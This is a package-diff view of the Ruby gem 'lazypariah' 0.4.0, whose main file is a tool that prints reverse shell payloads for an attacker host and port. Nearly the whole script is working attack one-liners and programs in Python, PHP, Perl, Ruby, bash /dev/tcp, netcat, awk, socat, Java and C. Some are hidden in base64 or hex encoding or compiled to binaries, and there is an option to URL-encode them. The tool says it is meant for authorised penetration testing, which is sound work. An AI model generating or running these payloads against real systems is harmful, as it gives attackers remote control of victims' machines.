lazypariah 0.4.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +7 -0
- data/bin/lazypariah +332 -0
- metadata +51 -0
checksums.yaml
ADDED
@@ -0,0 +1,7 @@
|
|
1
|
+
---
|
2
|
+
SHA256:
|
3
|
+
metadata.gz: a3aee611f4d7a3d19d4c7816eee540e7a2d0e04523e565719158e78fe365a026
|
4
|
+
data.tar.gz: 7f63871c91c193144da7182a32eabd9c401561deb8fbf1c6678ceb953a8d9a37
|
5
|
+
SHA512:
|
6
|
+
metadata.gz: f049e7ff4764242aab6cee06bb8b9e314061d751241260e66045465e4dd38c926fe483886b7513c684d0ee9b26c8bb12d039f5f6ab8831b313856f7d431beb91
|
7
|
+
data.tar.gz: 48c488ee7a6776f336d7e806bcb914645ab04cc56cc0adda1c9aaeec70999b0f2b94ed30f7818c4e67d74bb5638b113889e3c938bd45d80c91932ddfb89a1a93
|
data/bin/lazypariah
ADDED
@@ -0,0 +1,332 @@
|
|
1
|
+
#!/usr/bin/env ruby
|
2
|
+
#
|
3
|
+
# Title: LAZYPARIAH
|
4
|
+
# Version: 0.4.0
|
5
|
+
# Description:
|
6
|
+
# LAZYPARIAH is a simple tool for generating various reverse shell payloads
|
7
|
+
# on the fly. It is intended to be used only in authorised circumstances by
|
8
|
+
# qualified penetration testers, security researchers and red team professionals.
|
9
|
+
#
|
10
|
+
# Copyright (C) 2020 Peter Bruce Funnell
|
11
|
+
#
|
12
|
+
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU
|
13
|
+
# General Public License as published by the Free Software Foundation, either version 3 of the License,
|
14
|
+
# or (at your option) any later version.
|
15
|
+
#
|
16
|
+
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
|
17
|
+
# the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
|
18
|
+
# License for more details.
|
19
|
+
#
|
20
|
+
# You should have received a copy of the GNU General Public License along with this program. If not,
|
21
|
+
# see <https://www.gnu.org/licenses/>.
|
22
|
+
|
23
|
+
# Load the necessary gems.
|
24
|
+
require "base64"
|
25
|
+
require "optparse"
|
26
|
+
require "erb"
|
27
|
+
require "zlib"
|
28
|
+
require "stringio"
|
29
|
+
|
30
|
+
# Define constants.
|
31
|
+
PROGRAM_NAME = "LAZYPARIAH".freeze()
|
32
|
+
PROGRAM_VERSION = "0.4.0".freeze()
|
33
|
+
EXECUTABLE_NAME = "lazypariah".freeze()
|
34
|
+
|
35
|
+
# Define payload list.
|
36
|
+
PAYLOAD_LIST = [
|
37
|
+
"python",
|
38
|
+
"python3_c",
|
39
|
+
"python2_c",
|
40
|
+
"python_c",
|
41
|
+
"python3_b64",
|
42
|
+
"python2_b64",
|
43
|
+
"python_b64",
|
44
|
+
"python3_hex",
|
45
|
+
"python2_hex",
|
46
|
+
"python_hex",
|
47
|
+
"nc",
|
48
|
+
"nc_pipe",
|
49
|
+
"php_fd_3",
|
50
|
+
"php_fd_4",
|
51
|
+
"php_fd_5",
|
52
|
+
"php_fd_6",
|
53
|
+
"php_fd_3_c",
|
54
|
+
"php_fd_4_c",
|
55
|
+
"php_fd_5_c",
|
56
|
+
"php_fd_6_c",
|
57
|
+
"php_fd_3_tags",
|
58
|
+
"php_fd_4_tags",
|
59
|
+
"php_fd_5_tags",
|
60
|
+
"php_fd_6_tags",
|
61
|
+
"perl",
|
62
|
+
"perl_c",
|
63
|
+
"perl_b64",
|
64
|
+
"perl_hex",
|
65
|
+
"ruby",
|
66
|
+
"ruby_c",
|
67
|
+
"ruby_b64",
|
68
|
+
"ruby_hex",
|
69
|
+
"bash_tcp",
|
70
|
+
"awk",
|
71
|
+
"socat",
|
72
|
+
"java_class_binary",
|
73
|
+
"java_class_b64",
|
74
|
+
"java_class_gzip_b64",
|
75
|
+
"c_binary",
|
76
|
+
"c_binary_b64",
|
77
|
+
"c_binary_hex",
|
78
|
+
"c_binary_gzip",
|
79
|
+
"c_binary_gzip_b64",
|
80
|
+
"c_binary_gzip_hex"
|
81
|
+
].sort()
|
82
|
+
|
83
|
+
# Define function for displaying program information.
|
84
|
+
def prog_info(donation_info=true)
|
85
|
+
puts("#{PROGRAM_NAME} #{PROGRAM_VERSION}")
|
86
|
+
puts("Copyright (C) 2020 Peter Bruce Funnell")
|
87
|
+
if donation_info
|
88
|
+
puts("\nBTC Donation Address (Author): 3EdoXV1w8H7y7M9ZdpjRC7GPnX4aouy18g")
|
89
|
+
end
|
90
|
+
end
|
91
|
+
|
92
|
+
# Initialise command line argument parser.
|
93
|
+
option_parser = OptionParser.new do |options|
|
94
|
+
options.banner = "\nUsage:\t#{EXECUTABLE_NAME} [OPTIONS] <PAYLOAD TYPE> <ATTACKER HOST> <ATTACKER PORT>\n"
|
95
|
+
options.banner << "Note:\t<ATTACKER HOST> may be an IPv4 address, IPv6 address or hostname.\n\n"
|
96
|
+
options.banner << "Example:\tlazypariah -u python3_b64 10.10.14.4 1555\n"
|
97
|
+
options.banner << "Example:\tlazypariah python2_c malicious.local 1337\n\n"
|
98
|
+
options.banner << "Valid Payloads:\n"
|
99
|
+
PAYLOAD_LIST.each do |p|
|
100
|
+
options.banner << "#{" "*4}#{p}\n"
|
101
|
+
end
|
102
|
+
options.banner << "\nValid Options:\n"
|
103
|
+
options.on("-h", "--help", "Display help text and exit.")
|
104
|
+
options.on("-l", "--license", "Display license information and exit.")
|
105
|
+
options.on("-u", "--url", "URL-encode the payload.")
|
106
|
+
options.on("-v", "--version", "Display version information and exit.\n\n")
|
107
|
+
end
|
108
|
+
|
109
|
+
# Define port_check method for strings.
|
110
|
+
class String
|
111
|
+
def port_check()
|
112
|
+
(self.to_i.to_s == self) and (self.to_i >= 0 and self.to_i <= 65535)
|
113
|
+
end
|
114
|
+
end
|
115
|
+
|
116
|
+
# Define print_output.
|
117
|
+
def print_output(s, url_encode=false)
|
118
|
+
if url_encode
|
119
|
+
print(ERB::Util.url_encode(s))
|
120
|
+
else
|
121
|
+
print(s)
|
122
|
+
end
|
123
|
+
end
|
124
|
+
|
125
|
+
# Attempt to parse command line arguments.
|
126
|
+
begin
|
127
|
+
arguments = Hash.new()
|
128
|
+
option_parser.parse!(into: arguments)
|
129
|
+
if arguments[:version]
|
130
|
+
prog_info(donation_info=false)
|
131
|
+
exit()
|
132
|
+
else
|
133
|
+
if arguments.length < 1 and ARGV.length < 1
|
134
|
+
prog_info()
|
135
|
+
puts("\nNo command line arguments were detected. Please consult the help text below for details on how to use #{PROGRAM_NAME}.\n")
|
136
|
+
puts(option_parser)
|
137
|
+
exit()
|
138
|
+
elsif arguments[:help]
|
139
|
+
prog_info()
|
140
|
+
puts(option_parser)
|
141
|
+
exit()
|
142
|
+
elsif arguments[:license]
|
143
|
+
prog_info(donation_info=false)
|
144
|
+
puts("\nThis program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <https://www.gnu.org/licenses/>.")
|
145
|
+
elsif ARGV.length < 3
|
146
|
+
prog_info()
|
147
|
+
puts("\nThe command line arguments given to #{PROGRAM_NAME} were insufficient. #{PROGRAM_NAME} requires a payload type, attacker IP address and an attacker port in order to generate a reverse shell payload.\n")
|
148
|
+
puts(option_parser)
|
149
|
+
exit()
|
150
|
+
elsif ARGV.length > 3
|
151
|
+
prog_info()
|
152
|
+
puts("\nToo many command line arguments were given to #{PROGRAM_NAME}.\n")
|
153
|
+
puts(option_parser)
|
154
|
+
exit()
|
155
|
+
elsif not PAYLOAD_LIST.include?(ARGV[0])
|
156
|
+
prog_info()
|
157
|
+
puts("\n#{PROGRAM_NAME} did not recognise the specified payload. Please consult the valid list of payloads below.\n")
|
158
|
+
puts(option_parser)
|
159
|
+
exit()
|
160
|
+
elsif not ARGV[2].port_check()
|
161
|
+
prog_info()
|
162
|
+
puts("\nThe specified port was invalid. Please specify a port between 0 and 65535 (inclusive).\n\n")
|
163
|
+
else
|
164
|
+
url_encode = arguments[:url] ? true: false
|
165
|
+
case ARGV[0]
|
166
|
+
when "python"
|
167
|
+
print_output("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode=url_encode)
|
168
|
+
when "python3_c"
|
169
|
+
print_output("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
|
170
|
+
when "python2_c"
|
171
|
+
print_output("python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
|
172
|
+
when "python_c"
|
173
|
+
print_output("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
|
174
|
+
when "python3_b64"
|
175
|
+
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
176
|
+
print_output("echo #{code} | base64 -d | python3", url_encode=url_encode)
|
177
|
+
when "python3_hex"
|
178
|
+
code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
179
|
+
print_output("echo #{code} | xxd -p -r - | python3", url_encode=url_encode)
|
180
|
+
when "python2_b64"
|
181
|
+
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
182
|
+
print_output("echo #{code} | base64 -d | python2", url_encode=url_encode)
|
183
|
+
when "python2_hex"
|
184
|
+
code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
185
|
+
print_output("echo #{code} | xxd -p -r - | python2", url_encode=url_encode)
|
186
|
+
when "python_b64"
|
187
|
+
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
188
|
+
print_output("echo #{code} | base64 -d | python", url_encode=url_encode)
|
189
|
+
when "python_hex"
|
190
|
+
code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
191
|
+
print_output("echo #{code} | xxd -p -r - | python", url_encode=url_encode)
|
192
|
+
when "nc"
|
193
|
+
print_output("nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
|
194
|
+
when "nc_pipe"
|
195
|
+
print_output("/bin/sh | nc #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
|
196
|
+
when "php_fd_3"
|
197
|
+
print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");", url_encode=url_encode)
|
198
|
+
when "php_fd_4"
|
199
|
+
print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");", url_encode=url_encode)
|
200
|
+
when "php_fd_5"
|
201
|
+
print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");", url_encode=url_encode)
|
202
|
+
when "php_fd_6"
|
203
|
+
print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");", url_encode=url_encode)
|
204
|
+
when "php_fd_3_c"
|
205
|
+
print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");'", url_encode=url_encode)
|
206
|
+
when "php_fd_4_c"
|
207
|
+
print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");'", url_encode=url_encode)
|
208
|
+
when "php_fd_5_c"
|
209
|
+
print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");'", url_encode=url_encode)
|
210
|
+
when "php_fd_6_c"
|
211
|
+
print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");'", url_encode=url_encode)
|
212
|
+
when "php_fd_3_tags"
|
213
|
+
print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");?>", url_encode=url_encode)
|
214
|
+
when "php_fd_4_tags"
|
215
|
+
print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");?>", url_encode=url_encode)
|
216
|
+
when "php_fd_5_tags"
|
217
|
+
print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");?>", url_encode=url_encode)
|
218
|
+
when "php_fd_6_tags"
|
219
|
+
print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");?>", url_encode=url_encode)
|
220
|
+
when "perl"
|
221
|
+
print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode)
|
222
|
+
when "perl_c"
|
223
|
+
print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode)
|
224
|
+
when "perl_b64"
|
225
|
+
code = Base64.strict_encode64("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};")
|
226
|
+
print_output("echo #{code} | base64 -d | perl", url_encode=url_encode)
|
227
|
+
when "perl_hex"
|
228
|
+
code = "use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};".unpack("H*")[0]
|
229
|
+
print_output("echo #{code} | xxd -p -r - | perl", url_encode=url_encode)
|
230
|
+
when "ruby"
|
231
|
+
print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode)
|
232
|
+
when "ruby_c"
|
233
|
+
print_output("ruby -e 'require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", url_encode=url_encode)
|
234
|
+
when "ruby_b64"
|
235
|
+
code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
|
236
|
+
print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
|
237
|
+
when "ruby_hex"
|
238
|
+
code = "require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end".unpack("H*")[0]
|
239
|
+
print_output("echo #{code} | xxd -p -r - | ruby", url_encode=url_encode)
|
240
|
+
when "bash_tcp"
|
241
|
+
print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
|
242
|
+
when "awk"
|
243
|
+
print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode)
|
244
|
+
when "socat"
|
245
|
+
print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode=url_encode)
|
246
|
+
when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
|
247
|
+
code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
|
248
|
+
|
249
|
+
temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
|
250
|
+
temp_file = temp_dir+"/rs.java"
|
251
|
+
|
252
|
+
system("echo '#{code}' > #{temp_file}; javac #{temp_file};")
|
253
|
+
|
254
|
+
File.open(temp_dir+"/rs.class", "r") do |f|
|
255
|
+
java_payload = f.read()
|
256
|
+
case ARGV[0]
|
257
|
+
when "java_class_binary"
|
258
|
+
print_output(java_payload)
|
259
|
+
when "java_class_b64"
|
260
|
+
java_payload_b64 = Base64.strict_encode64(java_payload)
|
261
|
+
print_output(java_payload_b64, url_encode=url_encode)
|
262
|
+
when "java_class_gzip_b64"
|
263
|
+
sio = StringIO.new()
|
264
|
+
sio.binmode()
|
265
|
+
gz = Zlib::GzipWriter.new(sio)
|
266
|
+
gz.write(java_payload)
|
267
|
+
gz.close()
|
268
|
+
java_payload_gzip = sio.string
|
269
|
+
java_payload_gzip_b64 = Base64.strict_encode64(java_payload_gzip)
|
270
|
+
print_output(java_payload_gzip_b64, url_encode=url_encode)
|
271
|
+
end
|
272
|
+
end
|
273
|
+
|
274
|
+
system("rm -r #{temp_dir}")
|
275
|
+
when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64", "c_binary_hex", "c_binary_gzip_hex"
|
276
|
+
code = "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\nint main(void){int port = #{ARGV[2]};struct sockaddr_in revsockaddr;int sockt = socket(AF_INET, SOCK_STREAM, 0);revsockaddr.sin_family = AF_INET;revsockaddr.sin_port = htons(port);revsockaddr.sin_addr.s_addr = inet_addr(\"#{ARGV[1]}\");connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));dup2(sockt, 0);dup2(sockt, 1);dup2(sockt, 2);char * const argv[] = {\"/bin/sh\", NULL};execve(\"/bin/sh\", argv, NULL);\nreturn 0;}"
|
277
|
+
|
278
|
+
temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
|
279
|
+
temp_file = temp_dir+"/rs.c"
|
280
|
+
|
281
|
+
system("echo '#{code}' > #{temp_file}; gcc #{temp_file} -o #{temp_dir+"/rs"};")
|
282
|
+
|
283
|
+
File.open(temp_dir+"/rs", "r") do |f|
|
284
|
+
binary_payload = f.read()
|
285
|
+
case ARGV[0]
|
286
|
+
when "c_binary"
|
287
|
+
print_output(binary_payload)
|
288
|
+
when "c_binary_b64"
|
289
|
+
binary_payload_b64 = Base64.strict_encode64(binary_payload)
|
290
|
+
print_output(binary_payload_b64, url_encode=url_encode)
|
291
|
+
when "c_binary_hex"
|
292
|
+
binary_payload_hex = binary_payload.unpack("H*")[0]
|
293
|
+
print_output(binary_payload_hex)
|
294
|
+
when "c_binary_gzip"
|
295
|
+
sio = StringIO.new()
|
296
|
+
sio.binmode()
|
297
|
+
gz = Zlib::GzipWriter.new(sio)
|
298
|
+
gz.write(binary_payload)
|
299
|
+
gz.close()
|
300
|
+
binary_payload_gzip = sio.string
|
301
|
+
print_output(binary_payload_gzip)
|
302
|
+
when "c_binary_gzip_b64"
|
303
|
+
sio = StringIO.new()
|
304
|
+
sio.binmode()
|
305
|
+
gz = Zlib::GzipWriter.new(sio)
|
306
|
+
gz.write(binary_payload)
|
307
|
+
gz.close()
|
308
|
+
binary_payload_gzip = sio.string
|
309
|
+
binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
|
310
|
+
print_output(binary_payload_gzip_b64, url_encode=url_encode)
|
311
|
+
when "c_binary_gzip_hex"
|
312
|
+
sio = StringIO.new()
|
313
|
+
sio.binmode()
|
314
|
+
gz = Zlib::GzipWriter.new(sio)
|
315
|
+
gz.write(binary_payload)
|
316
|
+
gz.close()
|
317
|
+
binary_payload_gzip = sio.string
|
318
|
+
binary_payload_gzip_hex = binary_payload_gzip.unpack("H*")[0]
|
319
|
+
print_output(binary_payload_gzip_hex)
|
320
|
+
end
|
321
|
+
end
|
322
|
+
|
323
|
+
system("rm -r #{temp_dir}")
|
324
|
+
end
|
325
|
+
end
|
326
|
+
end
|
327
|
+
rescue OptionParser::InvalidOption, OptionParser::MissingArgument
|
328
|
+
# Invalid command line arguments were detected. Say so, display the help text, and exit.
|
329
|
+
puts("\nOne or more command line arguments were invalid.\n")
|
330
|
+
puts(option_parser)
|
331
|
+
exit()
|
332
|
+
end
|
metadata
ADDED
@@ -0,0 +1,51 @@
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
2
|
+
name: lazypariah
|
3
|
+
version: !ruby/object:Gem::Version
|
4
|
+
version: 0.4.0
|
5
|
+
platform: ruby
|
6
|
+
authors:
|
7
|
+
- Peter Funnell
|
8
|
+
autorequire:
|
9
|
+
bindir: bin
|
10
|
+
cert_chain: []
|
11
|
+
date: 2020-11-24 00:00:00.000000000 Z
|
12
|
+
dependencies: []
|
13
|
+
description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
|
14
|
+
on the fly. It is intended to be used only in authorised circumstances by qualified
|
15
|
+
penetration testers, security researchers and red team professionals. Before downloading,
|
16
|
+
installing or using this tool, ensure that you understand the relevant laws in your
|
17
|
+
jurisdiction. The author of this tool does not endorse the usage of this tool for
|
18
|
+
illegal or unauthorised purposes.
|
19
|
+
email: hello@octetsplicer.com
|
20
|
+
executables:
|
21
|
+
- lazypariah
|
22
|
+
extensions: []
|
23
|
+
extra_rdoc_files: []
|
24
|
+
files:
|
25
|
+
- bin/lazypariah
|
26
|
+
homepage: https://github.com/octetsplicer/LAZYPARIAH
|
27
|
+
licenses:
|
28
|
+
- GPL-3.0+
|
29
|
+
metadata: {}
|
30
|
+
post_install_message:
|
31
|
+
rdoc_options: []
|
32
|
+
require_paths:
|
33
|
+
- lib
|
34
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
35
|
+
requirements:
|
36
|
+
- - ">="
|
37
|
+
- !ruby/object:Gem::Version
|
38
|
+
version: 2.7.1
|
39
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
40
|
+
requirements:
|
41
|
+
- - ">="
|
42
|
+
- !ruby/object:Gem::Version
|
43
|
+
version: '0'
|
44
|
+
requirements:
|
45
|
+
- A GNU/Linux or BSD operating system. Optional requirements are GCC (for C payloads)
|
46
|
+
and OpenJDK (for Java payloads).
|
47
|
+
rubygems_version: 3.1.2
|
48
|
+
signing_key:
|
49
|
+
specification_version: 4
|
50
|
+
summary: A tool for generating reverse shell payloads on the fly.
|
51
|
+
test_files: []
|